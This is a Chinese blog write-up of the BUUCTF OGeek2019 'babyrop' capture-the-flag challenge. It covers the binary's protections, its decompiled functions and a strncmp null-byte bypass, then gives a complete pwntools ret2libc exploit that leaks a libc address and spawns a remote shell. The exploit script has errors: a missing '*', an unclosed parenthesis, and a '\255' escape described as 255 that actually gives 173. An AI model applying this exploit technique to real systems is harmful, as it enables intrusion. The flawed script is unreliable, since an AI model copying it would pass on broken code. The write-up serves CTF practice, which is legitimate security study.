OGEEK_babyrop

最新推荐文章于 2023-02-24 21:43:52 发布
最新推荐文章于 2023-02-24 21:43:52 发布
阅读量141 收藏 1
点赞数
分类专栏: BUUCTF刷题记录 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44645415/article/details/117267803
版权

解题思路:ret2libc

检查保护机制

 Arch:     i386-32-little
 RELRO:    Full RELRO
 Stack:    No canary found
 NX:       NX enable
 PIE:      No PIE (0x8048000)

打开IDA反编译进入main函数后可以看到代码

int __cdecl main()
{
  int buf; // [esp+4h] [ebp-14h] BYREF
  char v2; // [esp+Bh] [ebp-Dh]
  int fd; // [esp+Ch] [ebp-Ch]

  sub_80486BB();
  fd = open("/dev/urandom", 0);
  if ( fd > 0 )
    read(fd, &buf, 4u);
  v2 = sub_804871F(buf);
  sub_80487D0(v2);
  return 0;
}

read()函数:

定义:

ssize_t read(int fd, void *buf, size_t count);
//fd:文件描述符,从commandline获取数据时为0;buf:目标缓冲区;count:读取的字节数;函数返回值为实际读取的字节数,读取失败返回-1,调用read前达到文件末尾返回0(读取count个字节到buf指向的缓冲区);将command line中count个字节写入buf

进入sub_804871F()函数:

int __cdecl sub_804871F(int a1)
{
  size_t v1; // eax
  char s[32]; // [esp+Ch] [ebp-4Ch] BYREF
  char buf[32]; // [esp+2Ch] [ebp-2Ch] BYREF
  ssize_t v5; // [esp+4Ch] [ebp-Ch]

  memset(s, 0, sizeof(s));
  memset(buf, 0, sizeof(buf));//到这一步中字符串S和buf中所有元素都相同
  sprintf(s, "%ld", a1);//a1输入到S中
  v5 = read(0, buf, 0x20u);
  buf[v5 - 1] = 0;//读入buf的最后一个元素置零
  v1 = strlen(buf);
  if ( strncmp(buf, s, v1) )
    exit(0);
  write(1, "Correct\n", 8u);
  return buf[7];
}

sprintf()函数

int sprintf( char *buffer, const char *format [, argument,...] );
//将format指向的格式化字符串输入到buffer指向的字符串

strncmp()函数

int strncmp(const char *str1, const char *str2, size_t n);//比较字符串str1和str2的前n个字符
/*自左向右逐个按照ASCII码值进行比较n个字符,直到出现不同的字符或遇’\0’为止,str1-str2的数值就是返回值。
如果返回值 < 0,则表示 str1 小于 str2。
如果返回值 > 0,则表示 str2 小于 str1。
如果返回值 = 0,则表示 str1 等于 str2。*/

strncmp()函数存在\0截断,如果比较buf和s相同就自动退出,因此可以利用\0截断跳过比较,防止退出

进入 sub_80487D0()函数

ssize_t __cdecl sub_80487D0(char a1)
{
  ssize_t result; // eax
  char buf[231]; // [esp+11h] [ebp-E7h] BYREF

  if ( a1 == 127 )
    result = read(0, buf, 0xC8u);
  else
    result = read(0, buf, a1);
  return result;
}

上一个函数的返回值在这个函数作为a1的值,这里buf的大小为0xE7=231Bytes,所以考虑将a1写为255实现栈溢出

(255-231-4=20bytes,最多20bytes空间)

exp:

from pwn import *

context.os='linux'
context.arch='i386'
context.log_level='debug'

sl=lambda x:r.sendline(x)
rl=lambda :r.recvline()

r=remote('node3.buuoj.cn',27787)
elf=ELF('./babyrop')
libc=ELF('./libc-2.23.so')

main_addr=0x8048825

payload='\0'*7+'\255'#\0截断绕过strncmp()比较并将buf[7]的值改为255
sl(payload)
rl()

payload1 = 'a'*(0xe7+4)
payload1 += p32(elf.plt['write'])+p32(1)+p32(elf.got['write'])+p32(4)
#write(1,elf.got['write'],4),打出write()的真实地址
payload1 += p32(main_addr)
#回到主函数实现二次利用

sl(payload1)
write_addr=u32(r.recv(4))
libc_addr=write_addr-libc.sym['write']#函数地址-偏移=libc基地址

payload2='\0'*7+'\255'
sl(payload2)
rl()

payload3='a'(0xe7+4)
payload3+=p32(libc_addr+libc.symbols['system'])+p32(0)+p32(libc_addr+libc.search('/bin/sh\0').next()
sl(payload3)

r.interactive()

Tips:

1,write()函数

ssize_t write(int fd,const void *buf,size_t count);
//fd:文件描述符(==1则输出到command line);buf:目标缓冲区;count:字节数;将buf中count个字节写入commandline

2,调用write()时如果没有加载这个函数,那么默认调用dl_runtime_resolve()在got表中写入真实地址(Lazy Binding)

NUNKD
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
oGeek_Ray_1-数据集
03-30
标题 "oGeek_Ray_1-数据集" 暗示我们正在处理一个与数据相关的集合,可能是用于分析、机器学习或数据挖掘任务。标签 "数据集" 确认了这一点,意味着这个压缩包包含一个或多个数据文件,供用户进行数据处理。 根据...
OGeek_round1-数据集
03-29
标题中的“OGeek_round1-数据集”指的是一个与OGeek竞赛第一轮相关的数据集,这通常意味着它包含了用于训练和评估机器学习或数据分析模型的数据。在数据科学和机器学习领域,数据集是至关重要的,它们是构建预测模型...
[BUUCTF-pwn] wdb_2018_final_pwn3
weixin_52640415的博客
12-16 348
一个栈溢出的题,没开PIE 程序先打开随机数发生器,读入然后加密,与输入的对比,不同时可输入0x400数据(溢出)相同则跳出循环。 fd = open("/dev/urandom", 0); while ( 1 ) { puts("\nFind a MD5 hash collision!"); printf("target: "); read(fd, buf, 0x3FFuLL); crypto(buf, 0x64uLL, (__int64)s2);
随机数的生成
后台开发
10-30 1万+
以前用rand和srand生成过伪随机数,伪随机数的序列是固定的,今天学习生成真正的随机数的生成。 利用/dev/urandom可以生成随机数的值,/dev/urandomLinux下的熵池,所谓熵池就是当前系统下的环境噪音,描述了一个系统的混乱程度,环境噪音由这几个方面组成,如内存的使用,文件的使用量,不同类型的进程数量等等。 #include <stdio.h&g...
Buu CTF PWN [第五空间2019 决赛]PWN5 WriteUp
m0sway的博客
03-04 378
Buu CTF PWN题第五空间2019 决赛]PWN5的WriteUp
利用/dev/urandom文件创建随机数
wu_cai_的专栏
05-13 3952
1:/dev/urandom和/dev/random是什么   这两个文件记录Linux下的熵池,所谓熵池就是当前系统下的环境噪音,描述了一个系统的混乱程度,环境噪音由这几个方面组成,如内存的使用,文件的使用量,不同类型的进程数量等等,刚开机的时候系统噪音会较小。在这两个设备的差异在于:/dev/random的random pool依赖于系统中断,因此在系统的中断数不足时,/dev/random...
[OGeek2019]babyrop
m0sway的博客
03-22 1111
[OGeek2019]babyrop WriteUp BUU_PWN
TianChi_OGeek
03-19
"TianChi_OGeek"很可能是一个与数据分析或机器学习相关的项目,参与者需要解决特定的数据问题并提交解决方案。在这个项目中,我们遇到了一个具体的问题,即在训练数据集(train)的第1815102行存在一个遗漏的引号,这...
天池OGeek算法挑战赛数据.zip
12-21
标题中的“天池OGeek算法挑战赛数据.zip”表明这是一个与阿里巴巴天池平台上的OGeek算法竞赛相关的数据集。天池是阿里云主办的一个数据科学和机器学习竞赛平台,旨在促进数据科学的发展和应用,挑战赛通常涉及到各种...
OGeek
03-19
lgb 代码入口:sh base_run.sh。 写了很多冗余特征,跑起来非常慢,需要做一下特征选择。 线上提交后0.7154。 代码中用到了分词和词向量,需要将切词的代码换成自己的切词代码,需要自己提供词向量。...
house of storm 的利用
蚁景网安学院
07-01 793
题目逻辑init_data利用mallopt函数将fastbin关闭,并且通过mmap函数分配一段地址空间,空间的范围为0x13370000-0x13371000,通过fd=open(&...
PWN随笔记录
最新发布
NANMUZN的博客
02-24 113
随手笔记嘻嘻嘻嘻
php int整数溢出,整数溢出 - SegmentFault 思否
weixin_42520796的博客
03-24 927
什么是整数溢出由于整数在内存里保存在一个固定长度的空间内,它能存储的最大值和最小值是固定的,如果我们尝试去存储一个数,而这个数又大于这个固定的最大值时,就会导致整数溢出整数溢出的危害如果一个整数用来计算一些敏感数值,如缓冲区大小或数值索引,就会产生潜在的危险。通常情况下,整数溢出并没有改写额外的内存,不会直接导致任意代码执行,但是它会导致栈溢出和堆溢出,而后两者都会导致任意代码执行。由于整数溢出出...
软件如何画pcb螺丝孔_如何画函数图像(常见函数篇)——动态数学软件GeoGebra...
weixin_33397994的博客
01-13 443
在GeoGebra里,一输入表达式,函数图像瞬间出来。下面,我们来看看常见函数是如何输入的。分类普通函数例:f(x) = sin(2x),g(x) = x² + 2【直接输入“=”右边的式子即可】分别输入sin(2x) , x^2 + 2系数待定的函数【法一】输入表达式,再点“创建滑动条”例:f(x) = k x + b输入k x + b,再“创建滑动条”【法二】先创建滑动条,再输入表达式例:f(...
[OGeek2019]babyrop | BUUCTF | got表和plt表
Dem1的博客
04-27 85
一、解题 1. sub_80486BB 没用,省略 fd=随机数 read(fd,&buf,4u);->buf 0x14 4 ->sub_804871F(buf) ->sub_80487D0(v2) 2. sub_804871F sprintf() v1=strlen(buf) -> 这里可以用\x00截断
Linux系统产生随机数 /dev/random和/dev/urandom
04-16 5593
/dev/random和/dev/urandom是Linux系统中提供的随机伪设备,这两个设备的任务,是提供永不为空的随机字节数据流。很多解密程序与安全应用程序(如SSH Keys,SSL Keys等)需要它们提供的随机数据流。这两个设备的差异在于:/dev/random的randompool依赖于系统中断,因此在系统的中断数不足时,/dev/random设备会一直封锁,尝试读取的进程就会进入等待...
利用linux的/dev/urandom文件产生较好的随机数
热门推荐
认知 行动 坚持
05-18 1万+
很多朋友经常用srand/rand产生随机数, 其实这种随机性并不好, 容易遭受攻击(很多时候, 也满足不了需求)。 在本文中, 我们来简要介绍一下利用linux的/dev/urandom文件产生较好的随机数, 直接上代码吧: #include #include int main() { int randNum = 0; int fd = open("/dev/urandom", O_R
strncmp读取字符串遇到的问题
赫的BLOG
01-15 1311
以前帮老师做考大学实验室的题时,有一道题如下 字符串asasadaslove中求出as的个数 今天在复习c primer plus正好看到strncmp想用这个实现 于是有了think1.c #include #include int main(void) { char list[21] = "asasadaslove"; int count = 0;
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值